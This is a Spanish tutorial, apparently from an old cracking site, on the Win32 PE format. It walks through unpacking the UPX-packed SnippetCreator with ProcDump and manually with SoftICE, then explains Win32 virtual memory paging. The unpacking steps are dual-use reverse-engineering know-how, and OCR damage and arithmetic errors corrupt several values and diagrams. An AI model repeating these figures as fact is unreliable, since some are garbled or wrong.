No olvides esto último, porque es muy útil para redirigir los llamados a funciones de la API de W32. 


Tenemos ya una idea de como se estructura el encabezado significado de sus campos. Todavía queda analizar otras 
importantes secciones predefinidas, como la sección de recursos .rcrs. Es una de las secciones más atractivas de los 
archivos PE. Debido a la complejidad de su estructura, prefiero diferir por ahora su análisis, ya que implica un concepto 
fundamental para el programador: árbol de búsqueda. Se trata de un concepto de datos estructurados que merecería una 
atención especial. 


De todos modos hagamos un ejercicio para consolidar conocimientos. 


Os 
Vi 


Al Atake 


DESEMPAQUETANDO EJECUTABLES 


Como ejercicio podemos tomar cualquier archivo ejecutable y examinar el encabezado con un editor hexadecimal, anotar 
los valores críticos y después comprobar si hemos acertado con cualquier volcador (dumper) de archivos PE, como 
EXESCOPE o PROCDUMP. 


Empleemos PROCDUMP y tomemos como víctima SNIPPETCREATOR de Iczelion. 

Se trata de un fabuloso programa ideado por un experto en W32 ASM. Además de permitir editar los encabezados de los 
archivos PE, sirve para insertar SNIPPETS (recortes) en archivos PE. En otras palabras, este programa permite insertar 
código en ejecutables, no sólo cambiar unos cuantos bytes, sino rutinas enteras. 


Para ver un poco la importancia de conocer los encabezados PE, este programa resulta ejemplar. Veamos. 


Supongamos que queremos hacer una lista muerta de SNIPPETCREATOR. Lo abrimos con WDASM232 8.9 o con IDA. 
¡Qué extraño!. No vemos llamado a ninguna APT W32. 


Carguemos el programa con SICE ¡Cáspita!, ¿qué pasa...?. No se despliega el programa en la ventana de SICE. Se abre 
directamente. 


Ahora despleguemos SICE (ctrl+D). Instalemos un BRKP: BPX GetModuleHandleA. Ahora ES y volvemos a Win. 
Iniciemos SNIPPETCREATOR. ¡Ahora sí! Se despliega SICE. Tecleamos F11 y ya estamos en SNIPPETCREATOR. 
Hacemos alt+C y bajamos por la ventana de código. Ahora si encontramos un montón de llamadas a APIs W32. Esto no 
se entiende. ¿De dónde salieron estas 

llamadas que no aparecieron en la lista muerta? 


Tal vez si hacemos un volcado con un editor de archivos PE, como PROCDUMP, podamos encontrar alguna orientación. 
Abramos SNIPPETCREATOR con el editor de PROCDUMP. 


¿Qué vemos en la ventana PE Structure Editor? El campo "Entry Point" (punto de entrada) tiene el valor 00018037h. 
Qué rareza. Generalmente este valor es 00001000h para los ejecutables PE. 


Veamos ahora el editor de estructuras (Struct Editor): pulsemos el botón "Sections". Caramba: ninguna sección del 
archivo lleva nombre predefinido. Los nombres que encontramos son: UPX0O, UPX1 y UPX3. El archivo tiene tres 
secciones con nombres no predefinidos. 


Ahora resumamos las observaciones: 

1. Encontramos diferencias entre la lista muerta generada por WDASM y el despliegue en memoria que nos presenta 
SICE. 

2. El punto de entrada del programa no es el convencional. 

3. Las secciones no tienen nombres predefinidos. 

4. El programa no es desplegado inmediatamente en SICE con el LOADER 


De 1 ya podemos deducir que el archivo está encriptado o empaquetado. Cuando generamos la lista muerta, lo que 
conseguimos es el código empaquetado. Para ejecutar el programa, el sistema debe montarlo en RAM, entonces debe 
desempaquetarlo primero. Esta es la importancia de los cargadores (LOADERS), desempaquetan los archivos y 
despliegan su contenido desempaquetado en memoria. Una vez hecho esto, podemos ver su verdadero contenido, incluso 
hasta volcarlo (dumping) a un archivo en disco duro. Esto explica la diferencia entre la lista muerta y el despliegue de 
SICE. 


El punto 2 apoya nuestra primera conclusión. El programa inicia no en su primera instrucción sino en otra, inicia en el 
código que va desempaquetando el programa original. 


El punto 3 es interesante ya que comienza a mostrarnos la importancia de conocer sobre los encabezados PE. Los 
nombres de las secciones, aunque no son los predefinidos, comienzan todos por el mismo prefijo: UPX. Si el archivo está 
empacado, el empacador utilizado cambia el nombre a las secciones y les asigna nuevos que inician con UPX. Veremos 
que con este dato es suficiente para desempacar SNIPPETCREATOR con PROCDUMP. 


El punto 4 nos dice que la sección con las instrucciones ejecutables del programa no tiene asignado los atributos 
correctos. Esto lo veremos luego. 


Nuestro análisis del punto 3 nos permite que ya procedamos a desempaquetar nuestra víctima. Pulsemos el botón 
"UNPACK" de PROCDUMP. En la caja de diálogo "Choose Unpacker" vemos una lista de desempacadores. 
Naveguemos por la lista. Aún sin saber mucho de desempacadores damos de inmediato con el desempacador correcto: 
UPX. Doble click sobre él, escogemos SNIPPETCREATOR, lo desempacamos y lo guardamos en disco duro. 


Ahora abramos el archivo desempaquetado con el PE Editor de PROCDUMP. ¡WAO!: ha cambiado el valor del punto 
de entrada, ahora es 00001000h, el convencional. Ahora echemos un vistazo en "Sections". ¡DE NUEVO WAO!: Ahora 
tenemos cuatro secciones. A las anteriores tres UPXs se agrega .idata, es decir, la sección con datos sobre nombres 
importados. 


También han cambiado las características (CHARACTERISTICS) y los desplazamientos virtuales (Virtual Offset) para 
las secciones. De esto hablaremos luego. 


Ahora hagamos una lista muerta del archivo desempacado. Con WDASM aparecen las llamadas a APIs aunque por 
ordinales. Con IDA PRO sí aparecen las llamadas a las APIs por nombre. El archivo ha sido desempaquetado. Ahora 
podemos sentarnos cómodamente a analizarlo y aprender como se hace un buen editor de archivos PE. 


En realidad no necesitamos PROCDUMP para hacer el desempaquetado. Sólo necesitamos hacer un volcado del 
encabezado PE y ver los nombres de las secciones para identificar el desempaquetador. También, conociendo el formato 
del encabezado, es suficiente abrir el archivo con un buen editor hexadecimal y buscar "manualmente" el encabezado de 
tablas de secciones y veremos los nombres incriminadores que revelan el empacador empleado. 


A propósito, podemos encontrar UPX en http://www.nexus.hu/upx/. Es freeware. Para el momento en que escribo esto, la 
versión disponible es la v0.84. Si comparamos la diferencia de tamaño entre el ejecutable empaquetado y el 
desempaquetado, nos daremos cuenta de la calidad de este empaquetador. No desempaca paquetes de versiones 
anteriores, así que no sirve para desempacar SNIPPETCREATOR v1.05. 


Ahora hasta podemos renombrar las secciones con los nombres predefinidos correspondientes, si quisieramos. Esto 
puede ser útil en ciertas ocasiones que por ahora no pienso mencionar. 


Ahora, supongamos que no tenemos a la mano el desempaquetador preciso, ni tampoco lo suministra PROCDUMP. 
Entonces podemos recurrir a otro método, el descrito por Volatily en su artículo Manually Unpacking - ASPack 
v1.083, que se puede conseguir en el inmeso WEB site de fravia. Es un método un tanto engorroso, pero funciona. Lo 


único es que no desempaca la sección .idata, entonces cuando lo desensamblamos no aparecen los nombres de las 
funciones API W32 en sus llamadas. 


Resumo los pasos de este procedimiento para desempacar manualmente un archivo ejecutable: 


1. Abrimos la víctima (SNIPPETCREATOR) con el PE Editor de PROCDUMP. 
2. Anotamos el punto de entrada (Entry Point): 00018037h 

3. En el editor de estructuras (Structures Editor) pulso "Sections". 

4. Anotamos los datos de la ventana Sections Editor: 


Sections Informations : 


Name | VitualSize_ [VitualOftset_ | RiawSize__ | RawoOltset 


00016000 00001000 0000000 00000400 E0000040 
DODODE50 00017000 00001000 00000400 C0000040 
UP2 00005029 00018000 00005029 00001400 E0000020 


5. Buscamos una sección ejecutable con la bandera de datos inicializados. 
Es la sección UPXO: 


000000040h datos inicializados. 
200000000h ejecutable. 

400000000h se puede leer. 

800000000h se puede escribir en la sección. 


E00000040h 


7. Para que el programa pueda ser desplegado por SICE al iniciar, cambiamos las características de la sección UPXO para 
hacerla una sección de código: reemplazamos E00000040h por E00000020h. Para hacer esto pulsamos sobre el nombre 
de la sección con el botón derecho del ratón y elegimos Edit Section del menú despegado. Se despliega ahora la caja de 
diálogo Modify section value. Reemplazamos el valor en el campo "Section Characteristics". Ahora podemos desplegar 
el ejecutable con el LOADER de SICE y desplegarlos en la pantalla del depurador. Anotamos también el desplazamiento 
(Virtual Offset) de esta sección: 1000h. Seguramente será la dirección donde inicia el programa original. 


8. Cargamos la víctima con SICE. Bajamos por el código del programa empleando la tecla F10, teniendo cuidado de 
colocar puntos de ruptura (BREACKPOINTS) o trampas en las instrucciones inmediatamente después de aquellas donde 
hay saltos hacia arriba. Por ejemplo: 

en la instrucción 0041806F hay un salto hacia arriba: JB 00418060, lo que indica que se trata de un bucle de miles 
vueltas. Entonces hacemos establecemos una trampa en la instrucción siguiente: BPX 00418073, y tecleamos FS para 
pasar por alto este bucle. Este procedimiento debe repetirse para cada bucle encontrado, si no queremos tardar años. 


9. En cualquier momento llegaremos a las instrucciones: 


004181CA 61 POPPAD 
004181CB E9308EfEFF  JMP 00401000 


Es un salto a la dirección 00401000h, que es el desplazamiento donde suponemos que inicia el código original del 
programa. Basamos esta suposición en el hecho de que esta es la dirección que generalmente establece por defecto el 
enlazador como punto de entrada. también en el hecho de que una de las secciones, seguramente la de código (.text) 
inicia aquí. Para asegurarnos que este es el caso, hacemos BPX 004181CB y seguimos (F10). Cuando arribamos a la 
dirección 00401000h ya podemos ver llamadas a funciones W32 API. Quiere decir que estamos en la sección de código. 


10. FS para salir de SICE. Cerramos la víctima y la corremos de nuevo. Seguramente se desplegará SICE en algunos de 
los BREAKPOINTS que dejamos cuando saltábamos bucles grandes.Debemos pulsar ES hasta llegar a 004181CB. 


11. Cuando llegamos aquí, cambiamos la instrucción: 
004181CB E9308EfEFF JMP 00401000 


por: 
004181CB E9308EfEFF — JMP004181CB 


Lo hacemos así: 
a 004181CB ¡mp 004181CB 


12. FS para volver a Win. El programa se ha quedado en un bucle infinito en la memoria. Abrimos PROCDUMP. 
Buscamos en la ventana de tareas (Tasks) de PROCDUMP a la víctima. Pulsamos sobre ella con el botón derecho del 
ratón. Elegimos "Dump (Full)" en el menú desplegado y guardamos el archivo desempacado en disco. 


13. Matamos la tarea víctima. 


14. Cambiamos el punto de entrada: abrimos el archivo desplegado con el PE Editor de PROCDUMP, y reemplazamos el 
valor en Entry Point por 00001000. 


15. Abrimos el archivo ya desempaquetado. Perfecto: funciona. Como vemos su tamaño se ha incrementado una 
barbaridad, lo que indica la potencia del empaquetador UPX. 


Si desensamblamos este desempaquetado con WDASM o con IDA, veremos los problemas de este método de 
desempaquetado: no se desempaqueta la sección de importaciones .idata, por lo tanto, no se despliegan los nombres de 
las funciones W32 API. 


Los primeros bytes del archivo... ¿Corresponden siempre y únicamente a la cabecera? 


Imagino que sí. El encabezado puede diividirse en cuatro grandes partes. La primera es el viejo encabezado DOS. El 
último campo de este encabezado apunta a un campo con un par de caracteres que dicen el formato del archivo 
ejecutable. Ahora, imaginate que este encabezado no esté aquí. El cargador no podría encontrar el encabezado PE ni 
tampoco podría determinar si se trata de un archivo PE (W32) o NE (W16) o LE (052). Hay algunas direcciones que 
varían pero cuando esto ocurre, algún campo del encabezado especifica dónde han sido relocalizados los datos. 


El encabezado es una estructura de datos por la cual el cargador de W32 siempre se orienta para acelerar la carga del 
ejecutable en vez de implementar algún algorritmo inteligente de búsqueda que impicaría un mayor costo en cuanto 
tiempo y trabajo de programación. 


¿Cuantos bytes tiene la cabecera? 


Respecto al tamaño, hay un campo que especifica este valor y se llama SizeOfHeaders y está en el encabezado PE 
(estructura _IMAGE_FILE_HEADER). El valor varía de acuerdo al número de secciones u objetos del PE. 


El valor decimal de "size of image'' en ProcDump no corresponde al tamaño real del fichero. ¿Por qué? 


Esto es consecuencia de los alineamientos. Realmente este campo indica la cantidad de espacio que se reserva en el 
espacio de direcciones para cargar el ejecutable. Una cosa es la memoria virtual reservada y otra la memoria física 
comprometida. Yo puedo reservar 10 MB e ir comprometiendo bloques de 300 KB según la necesidad que tenga de ello. 
Evidentemente, la memoria reservada deberá ser igual o mayor al tamaño de la imagen. El valor de "size of image"que 
vemos, por ejemplo, en ProcDump depende del valor "SectionAlignement", es decir, del alineamiento de las secciones. 
Es uno de los campos opcionales de la estructura _IMAGE_FILE_HEADER. 


Una página mide 4096 bytes. Si un PE tiene 3 secciones, todas de un tamaño menor a 4096 bytes, y si estas, de acuerdo a 
SectionAlignement" están alineadas en límites de 65.536 bytes, el tamaño de la imagen será 3 * 65.356 = 196.608 bytes. 


Si yo estoy creando el programa puedo controlar el valor de "size of image" variando "SectionAlignement" en las 
opciones del enlazador (de TLINK o de LINK), pero esto no es necesario, porque el mismo enlazador determina el valor 
de "SectionAlignement" a partir del tamaño de cada sección. 


Si la mayoría de los ejecutables tienen la misma dirección base 00400000h ¿como pueden proyectarse varios 
ejecutables a la vez? ¿Qué pasa cuando dos ejecutables tienen igual la: direccionbase + puntoentrada? 


Esto se aclara viendo cómo W32 convierte direcciones virtuales en direcciones reales. Es una cuestión crucial en SOs 


multiprocesos. W32 es uno de estos SOs, también UNIX y LINUX. Para no enredar mucho las cosas, se puede decir que 
W32 crea en memoria física una tabla para cada proceso en ejecución. Esta tabla contiene direcciones de entradas de otra 
tabla que son punteros hacia las direcciones en memoria real donde se encuentran las instrucciones o los datos cargados 
en la RAM. La dirección física de la primera entrada de la tabla que transforma direcciones virtuales en reales está en un 
registro del CPU llamado CR3 (CONTROL REGISTER 3). Para cualquier aplicación puedes obtener el valor en este 
registro empleando SICE simplemente con el comando CPU, el cual muestra el valor en los diferentes registros del CPU. 
Hay que tener en cuenta que el valor de CR3 es sólo la dirección física de la primera entrada de una tabla de punteros a 
direcciones físicas de otra tabla. Se requiere todavía tener el número de la entrada de esta primera tabla para saber donde 
está en la memoria física la segunda tabla. 


Fíjate que casi todas las direcciones virtuales de una aplicación comienzan con 0040XXXXh. No voy a explicarlo, pero 
esto indica la primera entrada de la tabla apuntada por CR3. Lo cierto es que cada tabla primaria es también una página 
de 4096 bytes, dividida en 1024 entradas de 32 bytes que son punteros a la base de otra tabla en memoria física. 


Ahora, ¿por qué un ejecutable en memoria no interrumpe a otro, aunque tengan las mismas bases virtuales? Las posibles 
respuestas a esta pregunta me parece que ya se tienen de alguna manera. La dirección real o física de la página de 
directorio activa se almacena en el registro CR3 del CPU, el cual cambia cada vez que W32 conmuta el control entre 
procesos. Para cada proceso, el sistema crea un directorio de página particular. Para procesos distintos no deben coincidir 
los directorios de página, de lo contrario se producirá un error de protección, como a veces ocurre. 


¿Qué utilidad tiene dividir los ejecutables en secciones? 


Para facilitar la ubicación de los datos. Además porque, como expliqué, cada sección tiene diferente función y diferentes 
atributos. Imagina el enrredo si el enlazador al crear el programa pusiera el código junto a los datos, mezclados con los 
recursos y otras cosas: uff! Esto es así siempre, incluso en DOS. Lo que pasa es que en DOS se segmenta la memoria; 
W32 la pagina. También podemos encontrar otras razones que exigirían el manejo de conceptos que finalmente terminan 
enrredándonos más y haciéndonos parecer que se trata de una cosa muy compleja. Se trata de explicaciones que podemos 
encontrar en libros sobre arquitectura de computadoras. Hay varios en español, posiblemente en alguna biblioteca. 


W32 puede manejar 4 Gb ffff:ffffffff que vemos en el sice. FFFFh x FFFFFFFFh = FFFF0001h = 4294901761 
bytes = 4 Gb Lo cual quiere decir que las direcciones que siempre vemos en sice no son de la ram sino de la 
memoria virtual ¿no? 


Muy cierto. Esto creo que cambiará el día que ya no necesitemos memoria virtual. De todos modos, si se tiene suficiente 
cantidad de RAM, en ocasiones podemos prescindir de ella. Yo nunca he probado, pero me han comentado que es más 
rápido. 


Las paginas de memoria parecen importantes ¿qué son? ¿Qué relación tienen con las direcciones que vemos en 
SICE? 


W32 divide la memoria física en "páginas" que tiene una longitud de 4096 bytes (4 KB). Una máquina con 8 MB de 
memoria tiene 2048 páginas. W32 mantiene una colección de tablas de página (también de 4 KB) para traducir 
direcciones virtuales a direcciones físicas. Cada proceso tiene su propia "página de directorio": una colección de hasta 
1024 entradas de 32 bits almacenadas contiguamente. La dirección real o física de la página de directorio activa se 
almacena en el registro CR3 del CPU, el cual cambia cada vez que W32 conmuta el control entre procesos. Por eso, las 
direcciones virtuales iguales entre dos procesos diferentes no apuntan a la misma dirección física, a no ser que refieran a 
espacios de memoria compartidos. 


Las direcciones que despliega SICE son virtuales y a partir de ellas se puede determinar la dirección de memoria física 
donde están los datos o instrucciones correspondientes. Para ello se puede emplear el comando PHYS, que busca la tabla 
de páginas y el Directorio de páginas asociado con el contexto de direcciones actual desplegado por SICE. Es decir, 
PHYS despliega todas las direcciones virtuales para direcciones físicas. Puede emplearse PEEK para leer desde la 
memoria física, ya que muestra el byte, word, o dword en una dirección física dada. PEEK es útil para leer registros de 
entrada o salida proyectados en memoria. También es útil el comando PAGE, el cual permite ver la proyección de todo el 
rango de direcciones lineales. Esto permite obtener la dirección física del directorio de página y verificar si las tablas de 
páginas del sistema operativo están proyectadas en la dirección lineal 0xC0000000. Véase La Memoria en W32: intro. 


¿Por qué necesitamos alineamientos? ¿ Por qué FileAligment usualmente usa límites en 512 bytes y 
SectionAlignment (después de que la imagen fue cargada en RAM) usualmente usa límites de 4096 bytes? 


W32 trata con paginación de memoria física y usa memoria virtual. Entonces W32 tiene que manejar memoria virtual y 
debe tener una manera rápida de encontrar los datos del archivo. Estas son las razones de la existencia del encabezado 


PE. 


W32 pagina la memoria física, la divide en regiones de tamaño fijo. En la arquitectura x86 cada página tiene un tamaño 
de 4096 bytes. Cualquier sección cargada en RAM debe tener un alineamiento para soportar paginación de memoria. 
Cuando el sistema reserva memoria, asegura que la región reservada sea un múltiplo par del tamaño de página. 
SectionAlignment garantiza que cada sección comience en una dirección virtual alineada a una página 


File Alignment es un valor que debe ser potencia de 2 entre 512 y 65,535. Es "la granularidad mínima de pedazos 
(chunks) de información dentro de la imagen antes de ser cargada" [Katz]. En el archivo PE, los datos brutos que 
comprenden cada sección deben comenzar en un múltiplo de FileAlignment. El valor por defecto es 512 bytes, 
probablemente para asegurar que las secciones siempre inicien en el comienzo de un sector del disco (el cual también 
tiene un tamaño de 512). 


¿Qué es un proceso? 


W32 llama proceso a un programa en ejecución. Un proceso posee un espacio de 4 GB con los datos y el código del 
archivo EXE de la aplicación. Un proceso es inerte, no hace nada. Para que haga algo debe poseer un hilo, el cual se 
responsabiliza de ejecutar el código presente en el espacio de direcciones del proceso. Incluso, un proceso puede tener 
más de un hilo en el mismo espacio de direcciones ejecutándose al mismo tiempo. Pero el proceso necesita por lo menos 
un hilo para ejecutar el código proyectado en su espacio de direcciones, en caso contrario el sistema destruye el proceso 
y su espacio de direcciones. 


¿Qué es un hilo (thread)? 


Es la descripción de la trayectoria que sigue la ejecución de un proceso. Cuando arranca un proceso, el sistema crea un 
hilo principal (llamando a CreateThread) el cual comienza llamando a la función WinMain, ejecutándola hasta alcanzar 
la función ExitProcess que culmina el proceso. La noción de hilo fue implementada por W32 para dar cuenta de la 
posiblidad de los procesos W32 de correr más de un subproceso al mismo tiempo. W32 llama hilos a los subprocesos. 


Bueno. Lo visto hasta ahora puede servir como una introducción al conocimiento de los archivos con formato PE y para 
adquirir cierta conciencia de la importancia de este asunto. Realmente deberíamos profundizar más. 


Como vieron he escogido como víctima a SNIPPETCREATOR. No es casual. Se trata de un programa muy poderoso, 
pero que requiere conocimiento de programación en ASM W32 y conocer el formato PE. Si tienes a la mano MASM 6.X 
o TASM 5.X, entonces podemos avanzar ya al estudio de SNIPPETCREATOR, lo cual nos dará mayor conocimiento 
sobre los archivos PE: 


snippetcreator: tutorial (en elaboración) 


Si no tienes conocimiento del lenguaje ensamblador para W32, pero todavía te interesa el tema de los PE, entonces 
pasemos a estudiar la sección de recursos de estos archivos. 


Y tú, > de recursos (en elaboración) 
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La Memoria en W32: intro 
Introducción 


La gestión de memoria en W32 se realiza a través de tres mecanismos: 


1- memoria virtual: cuando se quiere gestionar grandes estructuras de objetos. 

2- proyección de archivos en memoria: para gestionar grandes paquetes de datos en los archivos 
y compartir datos entre procesos distintos. 

3- montículos (heaps): para gestionar muchos bloques pequeños de datos. 


El tema está suficientemente desarrollado en tres artículos clásicos de Randy Katz: 


1- Managing Virtual Memory in Win32 
2- Managing Memory-Mapped Files in Win32 
3- Managing Heap Memory in Win32 


En este artículo me limitaré a explicar un poco la gestión de la memoria virtual en W32, concetrándome en la 
manera cómo W32 traduce direcciones virtuales a direcciones reales. Se trata de una adpatación de la sección 
"Finalmente, 32 bits" del capítulo "Gestión de memoria y entrada/salida de archivos" del libro Programación en 
Windows 95 de Charles Petzold. 


Al Atake 


¿QUÉ ES MEMORIA VIRTUAL? 


A medida que los programas de aplicación se han hecho más sofisticados y más grandes, se ha necesitado de 
ampliar las posibilidades de la memoria dinámica de los sistemas. Debido a lo poco económico que resulta atender 
la gran exigencia de memoria simplemente implementando ships con elevada capacidad de almacenamiento, este 
problema se ha abordado vía software, a través de sistemas operativos que ofrecen gestión de memoria virtual. 


Es un mecanismo de gestión de la memoria de un sistema que implementa un espacio de memoria ficticio, llamado 
espacio de direcciones o de nombres, el cual es mucho mayor que el espacio de memoria real física que posee el 
hardware del sistema. De esta manera, el programador al desarrollar aplicaciones para un SO con memoria virtual, 
no tiene que ocuparse de la memoria física, simplemente programa como si tuviera a su disposición una gran 
espacio de direcciones para cada proceso. 


¿CÓMO ES POSIBLE LA GESTIÓN DE MEMORIA VIRTUAL? 


El programador desarrolla sobre un gran espacio de memoria virtual, compila o ensambla sus fuentes para producir 
los ejecutables de sus aplicaciones. Es todo lo que hace. El SO se encarga de lo demás: traduce las direcciones 
virtuales en direcciones físicas y carga en la RAM del sistema sólo aquellos bloques de la aplicación que necesi ta, 
nunca carga todo el ejecutable ya que éste seguramente ocuparía todo el espacio de memoria física disponible y el 
sistema colapsaría. 


¿CÓMO TRADUCE W32 DIRECCIONES VIRTUALES A REALES? 


W32 requiere la presencia de un microprocesador Intel 386, 486 o Pentium. Estos procesadores usan 
direccionamiento de memoria de 32 bits y por tanto son capaces de acceder 2 elevado a la 32, es decir, 
4.294.967.296 bytes (4 gigabytes o GB) de memoria física. Por supuesto, la mayoría de los usuarios de W32 no 
están cerca de ese límite. 


Las direcciones de 32 bits usadas por los programas W32 para acceder al código y los datos no son las direcciones 
físicas de 32 bits que el microprocesador usa para direccionar la memoria física. La dirección que utiliza la 
aplicación se llama dirección «virtual» la cual es una dirección ficticia que se traduce a una dirección física a través 
de una «tabla de página». 


Para leer una instrucción o dato en la RAM, el CPU necesita colocar en el BUS de direcciones esa dirección donde 
debe estar ubicada la dirección o dato solicitado. Por ejemplo, si quiere acceder a la memoria de video, que está en 
0A0000h, el CPU debe colocar este valor en el BUS. 


Como las direciones de las aplicaciones son direcciones virtuales, el CPU debe traducirlas a direcciones físicas 
antes de acceder a los datos en la RAM. 


Las aplicaciones suelen ignorar este proceso. El programa parece almacenarse en un espacio de direcciones de 32 
bits y no hay nada extraño cuando se tiene que acceder a esta memoria. Sin embargo, es conveniente hacerse una 
idea de lo que significa esto. 


W32 pagina la memoria física, la divide en «páginas» con una longitud de 4096 bytes (4 KB). Una máquina 
equipada con 8 megabytes de memoria tiene 2048 páginas. W95/98 mantiene una colección de tablas de página 
(ellas mismas páginas 4 KB) para traducir direcciones virtuales a direcciones físicas. 


Cualquier proceso en W32 tiene su propia «página de directorio», que es una colección de hasta 1024 entradas de 
32 bits almacenadas contiguamente, una después de otra. La dirección física de la página de directorio activa se 
almacena en un registro del microprocesador llamado CR3 (CONTROL REGISTER 3), que se cambia cuando el 
SO conmuta el control entre procesos. Los 10 bits altos de una dirección virtual especifican una de las 1024 
entradas posibles en esta página de directorio. Los 20 bits altos de la entrada de la página de directorio indica una 
dirección física de una tabla de página (los 12 bits inferiores de la dirección física se definen a cero). Esto 
referencia otra página, que también tiene hasta 1024 entradas de 32 bits. Los 10 bits del medio de la dirección 
virtual referencian una de estas entradas. De nuevo, la entrada tiene una dirección física de 20 bits para indicar la 
posición de comienzo de un marco de página, que es una dirección física. Los 12 bits inferiores de una dirección 
virtual apuntan a una posición física dentro de este marco de página. 


Mostrado simbólicamente, uno puede representar una dirección virtual de 32 bits (que es con lo que trabaja una 
aplicación) como una entrada de página de directorio de 10 bits (d), una entrada de tabla de página de 10 bits (p) y 
un offset de 12 bits: 


dddd-dddd-ddpp-pppp-pppp-0000-0000-0000 


Para cada proceso, el microprocesador almacena un valor de 20 bits en el registro CR3 (1 de registro): 


TErC-CECE-PErr-Errr-rrrr 


La dirección física de comienzo de la página de directorio activa del proceso es: 


rrrr-rrrr-rrrr-rrrr-rrrr- 0000-0000-0000 


Recuérdese que todas las páginas se almacenan en límites de 4 KB, por tanto, cada página comienza en una 
dirección con los 12 bits inferiores igual a cero. El microprocesador primero accede a la dirección física: 


rrrr-rrrr-rrrr-rrrr-rrrr-dddd-dddd-dd00 


Esta posición contiene otro valor de 20 bits (t de tabla): 


tttt-tttt-tttt-tttt-cttt 


lo cual indica la dirección física de comienzo de una tabla de página: 


tttt-tttt-tert-tett-tttt-0000-0000-0000 


El microprocesador accede luego a una dirección física: 


tttt-tttt-tttt-tttt-tttt-pppp-pppp-pp00 


Almacenado en este área hay un valor de 20 bits de un marco de página (c de marco): 


CCCC-ECCC-CCCC-ECCC-ECCCC 


La dirección fisíca final de 32 bits es una combinación de este marco de página con los 12 bits de offset inferiores 
de la dirección virtual: 


CCCC-ECCC-EcCCeCe-ECCce-ecCCcc-0000-0000-0000 


Esta es la dirección física. Es todo. 


Puede parecer que traducir una dirección virtual en dirección física es un proceso que lleva mucho tiempo, pero 
realmente no es así. Los microprocesadores Intel 386, 486 y Pentium tienen una memoria cache interna que puede 
guardar estas tablas de página dentro del microprocesador. La traducción se realiza de forma muy rápida sin 
ninguna penalización de tiempo. Esta doble paginación (páginas que se guardan en una página) ofrece a cada 
aplicación un límite teórico de aproximadamente un millón de páginas de 4 KB. 


EMPLEANDO SICE 


Podemos revisar el proceso de traducción de memoria virtual a memoria física con SICE. 


Carguemos notepad.exe con el loader de SICE. Cuando se despliega la pantalla de SICE, el depurador está 
apuntando a la primera instrucción del programa cuya dirección virtual es 00401000h. A partir de esta dirección 
podemos calcular la dirección física donde se ubica esta instrucción en la RAM. 


Traduzcamos el valor hexadecimal de la dirección virtual a binario: 


0000 0000 0100 0000 0001 0000 0000 0000 


Tenemos: 
1. Entrada del directorio de páginas o primario, diez bytes altos: 


0000 0000 01 = 1 
Es la entrada 1 del directorio primario 


2. Entrada de la tabla de páinas o directorio secundario, diez bytes medios: 


00 0000 0001 = 1 
Es la entrada 1 del directorio secundario 


3. Desplazamiento en el marco de página de memoria física, doce bytes bajos restantes: 


0000 0000 0000 = 0 


Comienzo del marco de página o desplazamiento cero. Recuérdese que es la primera instrucción del programa. 
Para determinar exactamente la dirección física de la dirección debemos: 


1. obtener la dirección física donde está el directorio de páginas activas o directorio primario. Este valor está en 
CR3 y lo obtenemos con el comando 'CPU' de SICE. Cada entrada de este directorio es un puntero al directorio 
secundario. 


2. obtener la dirección de la entrada en el directorio primario donde se encuentra la dirección del comienzo del 
directorio secundario. Sabemos la dirección del inicio del directorio primario por los 20 bits altos del contenido de 
CR3. La entrada dentro del directorio primario que dice donde está la tabla que interesa está indicada por los diez 
bits altos de la dirección virtual. Como cada entrada del directorio primario es de 32 bits = 4 bytes, hay que 
multiplicar el número de entrada por 4 para obtener la dirección de la entrada correspondiente en el directorio 
primario. 


3. obtener la dirección física dónde se encuentra la tabla de páginas o directorio secundario. Con la dirección de la 
entrada del directorio de página donde está la dirección de la tabla de páginas activas, se puede emplear el comando 
PEEK de SICE para obtener esta última dirección: 


PEEK D DIRECCIÓN_DE_ENTRADA_DE_DIRECTORIO_PRIMARIO 


4. obtener la dirección de la entrada en la tabla de páginas donde está la dirección del inicio o marco de la página 
donde está la instrucción apuntada por la dirección virtual. Sabemos la dirección del inicio del directorio secundario 
por los 20 bits altos del contenido la entrada del directorio primario. La entrada dentro del directorio primario que 
dice donde está el mmraco de página que buscamos está indicada por los diez bits medios de la dirección virtual. 
Como cada entrada del directorio secundario es de 32 bits=4 bytes, hay que multiplicar el número de entrada por 4 
para obtener la dirección de la entrada correspondiente en el directorio secundario. 


5. obtener la dirección física dónde se encuentra el marco de página donde se ubica la instrucción señalada por la 
dirección virtual. Con la dirección de la entrada del directorio secundario donde está la dirección del marco de 
páginas, se puede emplear el comando PEEK de SICE para obtener esta última dirección, ya que este comando 
devuelve el contenido de una dirección física: 


PEEK D DIRECCIÓN _DE_ENTRADA_DE_DIRECTORIO_SECUNDARIO 


6. obtener la dirección física de la instrucción en la página específica. Este valor se obtiene a partir de los 20 bits 
altos del contenido en la entrada correspondiente en el directorio secundario y los 12 bits bajos en la dirección 
virtual. Estos bits bajos de la dirección virtual son un desplazamiento dentro del marco de página donde se ubicó el 
contenido de la aplicación. 


7. obtener el contenido en la dirección física señalada por el desplazamiento dentro del marco de página donde se 
encuentra el código o los datos indicados por la dirección virtual. Finalmente el comando 


PEEK D DESPLAZAMIENTO_EN_MARCO_DE_PÁGINA 


devuelve, invertida, la instrucción en octal en la dirección virtual. Para comprobar esto, si el puntero de SICE 
apunta a esta dirección virtual el comando 


D EIP 


devuelve el mismo valor en la ventana de datos de SICE. También podemos verificar esto revisando el código en 
octal de la instrucción correspondiente. Debemos ver lo mismo pero invertido. El comando 


CODE ON 
lo mostrará. 
Contiínuemos con notepad.exe. 
Ya tenemos los valores que corresponden a la dirección virtual de la primera instrucción de notepad.exe 


La dirección física de la página de directorio o directorio primario lo obtenemos con el comando CPU de SICE: 
008170000h. Traduzcámoslo a binario: 


0000 0000 1000 0001 0111 0000 0000 0000 


Los primeros 20 bits de este número indican la dirección física del comienzo del directorio primario del proceso 
activo. Los diez bits altos de la dirección virtual nos dicen que se trata de la primera entrada en este directorio 


0000 0000 1000 0001 0111 - 0000 0000 01 - 00 


A A 


bytes altos en CR3 - — bytes altos 
en dir virtual 


obtenemos una nueva dirección física, la de la entrada 1 de la tabla de pá- 
ginas o directorio secundario: 00817004h. 


Ejecutemos el comando PEEK D 817004. 


PEEK D 00817004 
SICE nos dá: 01EFE267 


Obtenemos ahora la dirección física del directorio secundario. En binario: 


0000 0001 1110 1111 1110 001001100111 


Los doce bits altos de este valor apuntan al inicio del directorio secundario. Los diez bits medios indican una 
entrada dentro de este directorio. 


1100 0001 1011 1011 1111 - 00 0000 0001 - 00 


A A 


bytes altos en 0IEFE267  - bytes medios 
en dir virtual 


En hexadecimal: 01EFF004H 


